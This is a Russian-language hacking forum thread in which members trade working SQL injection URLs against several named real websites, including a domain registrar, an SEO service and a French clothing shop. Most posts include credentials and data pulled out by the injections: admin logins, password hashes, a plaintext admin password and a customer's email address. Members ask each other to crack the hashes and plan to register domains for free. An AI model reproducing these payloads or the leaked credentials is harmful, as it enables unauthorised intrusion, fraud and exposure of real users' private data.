29.12.2008, 23:43
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
С нами:
9149515
Репутация:
7
|
|
Поясните, что за дрянь, уже порядка трех десятков с такой дрянью нашел:
http://www.ac-alp.ru/part/index.php?id=-42+order+by+10--
А он мне пишет:
Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.
|
|
|
30.12.2008, 00:44
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex
Код:
http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--
Логин/пасс:
--------------------------------------------------
The End! |
|
|
|
30.12.2008, 01:43
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Вот кароче что я обкуренный нафигачил:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((
Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End! |
|
|
|
30.12.2008, 02:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
-m0rgan-, а финальный - это какой ?)
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password) ,3,4,5+from+naira_clients.tbladmins
ADMIN/E7AA807F2B59DE7B73495FF59B30EC26
опередили, потрите плз )
|
|
|
|
30.12.2008, 02:04
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами:
9463474
Репутация:
155
|
|
Сообщение от -m0rgan-
Вот кароче что я обкуренный нафигачил:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((
Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End! http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
|
|
|
|
30.12.2008, 02:21
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от masternet
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
И мне в ПМ плз!!!! 
|
|
|
|
30.12.2008, 01:37
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
purple.fr магазинчик
http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database (),user())/*
5.0.32-Debian_7etch8-log/purple/purple@localhost
http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login ,passwd))+from+user/*
root/6teutd7UL7NG.
http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from +customer+limit+4200,1/*
felipe_e@hotmail.com/19l0ZUzMeK.b.
|
|
|
|
30.12.2008, 01:42
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Код:
http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--
aDMin:03110WoodBury |
|
|
|
30.12.2008, 02:01
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(use rname,0x3A,password)))),3,4,5+from+naira_clients.t bladmins--
За group_concat - спасибо, незнал.
|
|
|
|
30.12.2008, 02:19
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
А мне он выдал
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admins--
master:master
тока в админку не пускает (
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
